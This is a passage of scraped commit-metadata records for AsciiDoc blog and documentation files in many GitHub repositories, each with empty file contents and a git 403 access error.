typos\r\n","repos":"jpkrohling\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,pilhuhn\/hawkular.github.io,objectiser\/hawkular.github.io,jotak\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,hawkular\/hawkular.github.io,pilhuhn\/hawkular.github.io,jpkrohling\/hawkular.github.io,pilhuhn\/hawkular.github.io,pilhuhn\/hawkular.github.io,hawkular\/hawkular.github.io,lucasponce\/hawkular.github.io,jotak\/hawkular.github.io,hawkular\/hawkular.github.io,jotak\/hawkular.github.io,lucasponce\/hawkular.github.io,objectiser\/hawkular.github.io,lucasponce\/hawkular.github.io,jpkrohling\/hawkular.github.io,objectiser\/hawkular.github.io,hawkular\/hawkular.github.io","old_file":"src\/main\/jbake\/content\/blog\/2017\/02\/22\/pandas-and-hawkular-metrics.adoc","new_file":"src\/main\/jbake\/content\/blog\/2017\/02\/22\/pandas-and-hawkular-metrics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jotak\/hawkular.github.io.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a627852b38653c33fe69c31d1598958e614668b9","subject":"y2b create post The Dual Camera Honor 8 Smartphone","message":"y2b create post The Dual Camera Honor 8 Smartphone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-08-18-The-Dual-Camera-Honor-8-Smartphone.adoc","new_file":"_posts\/2016-08-18-The-Dual-Camera-Honor-8-Smartphone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9e257cfd30bb196a985f198c8387bdd74cecd0db","subject":"Publish 19-02-2015-Manual.adoc","message":"Publish 19-02-2015-Manual.adoc","repos":"devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io,devopSkill\/devopskill.github.io","old_file":"19-02-2015-Manual.adoc","new_file":"19-02-2015-Manual.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/devopSkill\/devopskill.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3311cd0554adc709eb0f73d74635b3b2f769c8fd","subject":"Add missing closing statement for code block","message":"Add missing closing statement for code block\n","repos":"mehtabsinghmann\/resilience4j,drmaas\/resilience4j,resilience4j\/resilience4j,javaslang\/javaslang-circuitbreaker,RobWin\/circuitbreaker-java8,resilience4j\/resilience4j,RobWin\/javaslang-circuitbreaker,drmaas\/resilience4j","old_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/ratpack.adoc","new_file":"resilience4j-documentation\/src\/docs\/asciidoc\/addon_guides\/ratpack.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/resilience4j\/resilience4j.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"19481cd5987071864e151dce386b99a68b01346e","subject":"Update 2015-05-05-Generating-an-RSS-feed-for-HubPressio.adoc","message":"Update 
2015-05-05-Generating-an-RSS-feed-for-HubPressio.adoc","repos":"alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io,alvarosanchez\/alvarosanchez.github.io","old_file":"_posts\/2015-05-05-Generating-an-RSS-feed-for-HubPressio.adoc","new_file":"_posts\/2015-05-05-Generating-an-RSS-feed-for-HubPressio.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/alvarosanchez\/alvarosanchez.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d54c8c0c178848999a4712717f961239da04d405","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"88dbba4b4cc377faf0751112b44102cb3df1dfd6","subject":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","message":"Update 2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_file":"_posts\/2016-07-22-Stable-Matching-Algorithm-in-progress.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ecc57910bff52732805180ea297da170f7aff568","subject":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","message":"Update 2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","repos":"hva314\/blog,hva314\/blog,hva314\/blog,hva314\/blog","old_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_file":"_posts\/2017-09-25-Backdoor-CTF-2017-Baby-0x41414141-pwn.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hva314\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7e56f7c9aab22c6d8141c11954c2daf68ae2ca61","subject":"Update 2016-10-02-Settling-in-Japan.adoc","message":"Update 2016-10-02-Settling-in-Japan.adoc","repos":"endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/endymion64.github.io,endymion64\/VinJBlog,endymion64\/VinJBlog","old_file":"_posts\/2016-10-02-Settling-in-Japan.adoc","new_file":"_posts\/2016-10-02-Settling-in-Japan.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/endymion64\/endymion64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6bdb48507f67de14a51b31dc19c99ab86daada88","subject":"Update 2018-08-10-P-W-A-for-mahjong.adoc","message":"Update 
2018-08-10-P-W-A-for-mahjong.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_file":"_posts\/2018-08-10-P-W-A-for-mahjong.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5c6bf63ffe1a3b9ab811a7b0003baaab4f9c445","subject":"Renamed '_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc' to '_posts\/2017-10-19-The-journey-to-becoming-a-writer-begins-err-continues.adoc'","message":"Renamed '_posts\/2017-10-17-The-journey-to-becoming-a-writer-begins-err-continues.adoc' to '_posts\/2017-10-19-The-journey-to-becoming-a-writer-begins-err-continues.adoc'","repos":"ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com,ahopkins\/amhopkins.com","old_file":"_posts\/2017-10-19-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_file":"_posts\/2017-10-19-The-journey-to-becoming-a-writer-begins-err-continues.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ahopkins\/amhopkins.com.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c6c6c14503efc70194cca7fe50b072b774efe868","subject":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","message":"Update 2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_file":"_posts\/2018-01-15-S-T-U-D-Y-N-E-T-W-O-R-K-F-O-R-C-I-S-C-O-C-C-N-A-N-A-T.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9af37e569e8df47b9d1670ae6a80e401736effd7","subject":"Update 2016-11-07-Monday.adoc","message":"Update 2016-11-07-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-07-Monday.adoc","new_file":"_posts\/2016-11-07-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a478f4d2340ff3c0d6024ae89adf03832cd5ddc8","subject":"Fix links","message":"Fix links","repos":"joachimmetz\/artifacts,joachimmetz\/artifacts,pstirparo\/artifacts,Onager\/artifacts,Onager\/artifacts,pstirparo\/artifacts,ForensicArtifacts\/artifacts,ForensicArtifacts\/artifacts","old_file":"docs\/Artifacts definition format and style guide.asciidoc","new_file":"docs\/Artifacts definition format and style guide.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/joachimmetz\/artifacts.git\/': The requested URL returned error: 
403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6488a31890f6fa169716d483f7cb7fe7a48a8b62","subject":"Update 2015-04-28-Hello.adoc","message":"Update 2015-04-28-Hello.adoc","repos":"bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io,bahamoth\/bahamoth.github.io","old_file":"_posts\/2015-04-28-Hello.adoc","new_file":"_posts\/2015-04-28-Hello.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/bahamoth\/bahamoth.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"06b13493aa15b484dece338dff24b0b772d5ec4b","subject":"Update 2016-11-29-Draft.adoc","message":"Update 2016-11-29-Draft.adoc","repos":"PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io,PierreBtz\/pierrebtz.github.io","old_file":"_posts\/2016-11-29-Draft.adoc","new_file":"_posts\/2016-11-29-Draft.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/PierreBtz\/pierrebtz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b025eefc08162205ee7977ddd62a9475fef7233a","subject":"y2b create post PS3 TwistDock Unboxing \\u0026 Overview","message":"y2b create post PS3 TwistDock Unboxing \\u0026 Overview","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-02-27-PS3-TwistDock-Unboxing-u0026-Overview.adoc","new_file":"_posts\/2011-02-27-PS3-TwistDock-Unboxing-u0026-Overview.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f373dfeacfc58155e9e22a44354a600da9c48394","subject":"Update 2015-04-02-Up-and-running.adoc","message":"Update 2015-04-02-Up-and-running.adoc","repos":"CBSti\/CBSti.github.io,CBSti\/CBSti.github.io,CBSti\/CBSti.github.io","old_file":"_posts\/2015-04-02-Up-and-running.adoc","new_file":"_posts\/2015-04-02-Up-and-running.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/CBSti\/CBSti.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26813f36249da0781f68d5e3121e875eddcd66c5","subject":"Update 2015-05-14-Little-updates.adoc","message":"Update 2015-05-14-Little-updates.adoc","repos":"dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io,dobin\/dobin.github.io","old_file":"_posts\/2015-05-14-Little-updates.adoc","new_file":"_posts\/2015-05-14-Little-updates.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dobin\/dobin.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1eb939aa4a3c9844ea6fc6db37e3bb9b94c4ae33","subject":"Update 2020-04-27-The-onboarding.adoc","message":"Update 2020-04-27-The-onboarding.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2020-04-27-The-onboarding.adoc","new_file":"_posts\/2020-04-27-The-onboarding.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"508fa12357e69e6bdb168df474515981dc4ecd0c","subject":"Update 2016-07-21-2016-07-21.adoc","message":"Update 2016-07-21-2016-07-21.adoc","repos":"tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io,tamakinkun\/tamakinkun.github.io","old_file":"_posts\/2016-07-21-2016-07-21.adoc","new_file":"_posts\/2016-07-21-2016-07-21.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/tamakinkun\/tamakinkun.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f74ccd05299fdf87df0436258f752baba1b8975","subject":"Update 2018-02-02-.adoc","message":"Update 2018-02-02-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-02-02-.adoc","new_file":"_posts\/2018-02-02-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65520ebf6902df658199aab09013305a515d3d2e","subject":"y2b create post Essential Phone Unboxing - Is This Your Next Phone?","message":"y2b create post Essential Phone Unboxing - Is This Your Next Phone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-08-18-Essential-Phone-Unboxing--Is-This-Your-Next-Phone.adoc","new_file":"_posts\/2017-08-18-Essential-Phone-Unboxing--Is-This-Your-Next-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"faa3f8207bab58406d0f63304d55260032051882","subject":"Add changelog","message":"Add changelog","repos":"oskopek\/irsee.net,oskopek\/irsee.net","old_file":"CHANGELOG.adoc","new_file":"CHANGELOG.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oskopek\/irsee.net.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3a2a3029f329f6e72073131489ef2ef0f13aaaa1","subject":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","message":"Update 2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_file":"_posts\/2017-03-01-maven-ci-jobs-to-pipeline-with-jenkins2-and-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f9bc50ea47ae0853d29ee71169c1a450af4fc577","subject":"Update 2016-12-28-DNS-Made-Easy-2048-bit-DKIM-support.adoc","message":"Update 
2016-12-28-DNS-Made-Easy-2048-bit-DKIM-support.adoc","repos":"jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io,jarbro\/jarbro.github.io","old_file":"_posts\/2016-12-28-DNS-Made-Easy-2048-bit-DKIM-support.adoc","new_file":"_posts\/2016-12-28-DNS-Made-Easy-2048-bit-DKIM-support.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarbro\/jarbro.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"629d9ee6af398d93d3684a87548ba50eacb89238","subject":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","message":"Update 2016-06-24-mintia-and-frisk-and-arduino.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_file":"_posts\/2016-06-24-mintia-and-frisk-and-arduino.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"39bbd13a5cebe3164c41e9e1e0a26921bc82a344","subject":"Update 2015-07-28-My-First-Time-Y-Combinator-Application.adoc","message":"Update 2015-07-28-My-First-Time-Y-Combinator-Application.adoc","repos":"liyucun\/blog,liyucun\/blog,liyucun\/blog","old_file":"_posts\/2015-07-28-My-First-Time-Y-Combinator-Application.adoc","new_file":"_posts\/2015-07-28-My-First-Time-Y-Combinator-Application.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/liyucun\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6d24aedc827e0a1e84ad72bb21bba87948c95144","subject":"Update 2016-04-05-Episode-52-Zen-Studios-Easter-Mic-Drop.adoc","message":"Update 2016-04-05-Episode-52-Zen-Studios-Easter-Mic-Drop.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-04-05-Episode-52-Zen-Studios-Easter-Mic-Drop.adoc","new_file":"_posts\/2016-04-05-Episode-52-Zen-Studios-Easter-Mic-Drop.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aa31021c15321320f2b04a7e5c662811668edea2","subject":"Update 2017-07-26-Compatibility-issue-in-IE-Protect-Mode.adoc","message":"Update 2017-07-26-Compatibility-issue-in-IE-Protect-Mode.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-07-26-Compatibility-issue-in-IE-Protect-Mode.adoc","new_file":"_posts\/2017-07-26-Compatibility-issue-in-IE-Protect-Mode.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fc41b4d4dd475a584b90dfeaac0b0cce4b54881e","subject":"CAMEL-13165 - Docs updated","message":"CAMEL-13165 - Docs 
updated\n","repos":"zregvart\/camel,christophd\/camel,CodeSmell\/camel,adessaigne\/camel,christophd\/camel,nikhilvibhav\/camel,cunningt\/camel,pmoerenhout\/camel,gnodet\/camel,mcollovati\/camel,ullgren\/camel,pmoerenhout\/camel,pax95\/camel,ullgren\/camel,pmoerenhout\/camel,adessaigne\/camel,tdiesler\/camel,DariusX\/camel,tadayosi\/camel,objectiser\/camel,objectiser\/camel,adessaigne\/camel,gnodet\/camel,cunningt\/camel,zregvart\/camel,zregvart\/camel,punkhorn\/camel-upstream,tdiesler\/camel,cunningt\/camel,punkhorn\/camel-upstream,gnodet\/camel,tdiesler\/camel,pax95\/camel,pmoerenhout\/camel,christophd\/camel,objectiser\/camel,tdiesler\/camel,cunningt\/camel,tdiesler\/camel,tadayosi\/camel,christophd\/camel,pax95\/camel,pmoerenhout\/camel,alvinkwekel\/camel,adessaigne\/camel,pmoerenhout\/camel,CodeSmell\/camel,tdiesler\/camel,apache\/camel,nikhilvibhav\/camel,tadayosi\/camel,punkhorn\/camel-upstream,gnodet\/camel,cunningt\/camel,apache\/camel,davidkarlsen\/camel,christophd\/camel,CodeSmell\/camel,ullgren\/camel,davidkarlsen\/camel,adessaigne\/camel,alvinkwekel\/camel,apache\/camel,alvinkwekel\/camel,pax95\/camel,mcollovati\/camel,nikhilvibhav\/camel,Fabryprog\/camel,pax95\/camel,apache\/camel,davidkarlsen\/camel,christophd\/camel,tadayosi\/camel,DariusX\/camel,tadayosi\/camel,gnodet\/camel,punkhorn\/camel-upstream,nicolaferraro\/camel,davidkarlsen\/camel,nicolaferraro\/camel,Fabryprog\/camel,adessaigne\/camel,Fabryprog\/camel,alvinkwekel\/camel,CodeSmell\/camel,cunningt\/camel,DariusX\/camel,zregvart\/camel,ullgren\/camel,pax95\/camel,apache\/camel,apache\/camel,mcollovati\/camel,DariusX\/camel,nikhilvibhav\/camel,nicolaferraro\/camel,nicolaferraro\/camel,objectiser\/camel,mcollovati\/camel,tadayosi\/camel,Fabryprog\/camel","old_file":"components\/camel-aws-msk\/src\/main\/docs\/aws-msk-component.adoc","new_file":"components\/camel-aws-msk\/src\/main\/docs\/aws-msk-component.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/pax95\/camel.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e3f37c3d4c1c493dd77ad3130db3cb5d0f6c7f48","subject":"Update 2015-07-01-Hybris-E-commerce-suite.adoc","message":"Update 2015-07-01-Hybris-E-commerce-suite.adoc","repos":"jlboes\/jlboes.github.io,jlboes\/jlboes.github.io,jlboes\/jlboes.github.io","old_file":"_posts\/2015-07-01-Hybris-E-commerce-suite.adoc","new_file":"_posts\/2015-07-01-Hybris-E-commerce-suite.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jlboes\/jlboes.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"27f9b101c16a8b9f1940fab458b3456eaa08c477","subject":"Update 2017-07-26-Test-IE-False-Positives.adoc","message":"Update 2017-07-26-Test-IE-False-Positives.adoc","repos":"Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io,Elvisz\/elvisz.github.io","old_file":"_posts\/2017-07-26-Test-IE-False-Positives.adoc","new_file":"_posts\/2017-07-26-Test-IE-False-Positives.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Elvisz\/elvisz.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"563e4169a7f9d370a3e5cd32c72820077516aa2d","subject":"Update 2016-05-09-Episode-56-Stern-Pinball-App-or-Rollercoaster-Kickstarter.adoc","message":"Update 
2016-05-09-Episode-56-Stern-Pinball-App-or-Rollercoaster-Kickstarter.adoc","repos":"blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io,blahcadepodcast\/blahcadepodcast.github.io","old_file":"_posts\/2016-05-09-Episode-56-Stern-Pinball-App-or-Rollercoaster-Kickstarter.adoc","new_file":"_posts\/2016-05-09-Episode-56-Stern-Pinball-App-or-Rollercoaster-Kickstarter.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/blahcadepodcast\/blahcadepodcast.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"65a03b44693152f5c4979760f15ae8c718b10e86","subject":"Create README-ja.adoc","message":"Create README-ja.adoc","repos":"MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io,MCPH\/minecrafterph.github.io","old_file":"README-ja.adoc","new_file":"README-ja.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/MCPH\/minecrafterph.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"092fd64ff195a72821ee4d0b9fa5c3e5e430e7c2","subject":"2016-07-18-trees.adoc","message":"2016-07-18-trees.adoc\n","repos":"evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io,evolgenomology\/evolgenomology.github.io","old_file":"_posts\/2016-07-18-trees.adoc","new_file":"_posts\/2016-07-18-trees.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/evolgenomology\/evolgenomology.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a9b7fcd0daff4541a02a38e99ae5b43c5a048f19","subject":"Update 2016-12-2-3-Dpen.adoc","message":"Update 2016-12-2-3-Dpen.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-12-2-3-Dpen.adoc","new_file":"_posts\/2016-12-2-3-Dpen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"640a1e14fe623c3d0ba807cb22f9c2afbda2d8f2","subject":"Update 2016-09-09-Sample-Header.adoc","message":"Update 2016-09-09-Sample-Header.adoc","repos":"theblankpages\/theblankpages.github.io,theblankpages\/theblankpages.github.io,theblankpages\/theblankpages.github.io,theblankpages\/theblankpages.github.io","old_file":"_posts\/2016-09-09-Sample-Header.adoc","new_file":"_posts\/2016-09-09-Sample-Header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/theblankpages\/theblankpages.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89465c2f46ce654fa8e343ddee33f695785cccee","subject":"Update 2016-04-30-Microservices-are-about-applying-a-group-of-Best-Practices.adoc","message":"Update 
2016-04-30-Microservices-are-about-applying-a-group-of-Best-Practices.adoc","repos":"Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io,Vanilla-Java\/vanilla-java.github.io","old_file":"_posts\/2016-04-30-Microservices-are-about-applying-a-group-of-Best-Practices.adoc","new_file":"_posts\/2016-04-30-Microservices-are-about-applying-a-group-of-Best-Practices.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/Vanilla-Java\/vanilla-java.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5f6ac79494bae80c4188b45994613b6861832bb9","subject":"Update 2017-06-05-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","message":"Update 2017-06-05-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","repos":"elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind,elidiazgt\/mind","old_file":"_posts\/2017-06-05-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","new_file":"_posts\/2017-06-05-Si-aprendes-a-ejercitarte-aprendes-a-emprender-Mas-Sano-23.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/elidiazgt\/mind.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"12661eefb4713eff6a32a57a16920b78af59946a","subject":"Update 2020-02-07-Fast-4x4-Matrix-Inverse-with-SSE-SIMD-Explained-JP.adoc","message":"Update 